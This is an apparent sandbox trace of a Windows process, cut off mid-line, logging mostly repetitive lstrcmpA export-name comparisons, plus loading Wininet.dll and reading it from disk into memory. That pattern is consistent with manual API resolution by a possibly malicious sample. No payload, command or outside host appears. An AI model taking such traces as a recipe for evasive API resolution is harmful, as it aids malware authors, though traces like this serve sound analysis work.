[0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0216.864] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0216.864] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0216.864] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0220.074] GetProcessHeap () returned 0x550000 [0220.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57c600 | out: hHeap=0x550000) returned 1 [0220.075] GetProcessHeap () returned 0x550000 [0220.075] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x5691b0 [0220.076] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0220.092] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0220.092] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0220.092] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0220.092] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0220.093] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0220.093] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0220.093] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0220.093] GetProcessHeap () returned 0x550000 [0220.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x286600) returned 0x4121040 [0220.479] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0220.479] ReadFile (in: hFile=0x140, lpBuffer=0x4121040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4121040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0221.256] CloseHandle (hObject=0x140) returned 1 [0221.573] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0221.574] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0221.574] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0221.574] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0221.574] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0221.574] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0221.574] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0221.575] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0221.575] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0221.575] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0221.575] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0221.576] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0221.576] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0221.577] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0221.577] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0221.578] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.578] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0221.579] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0221.580] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0221.581] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0221.581] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0221.582] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0221.583] lstrcmpA (lpString1="CommitUrlCacheEntryW", 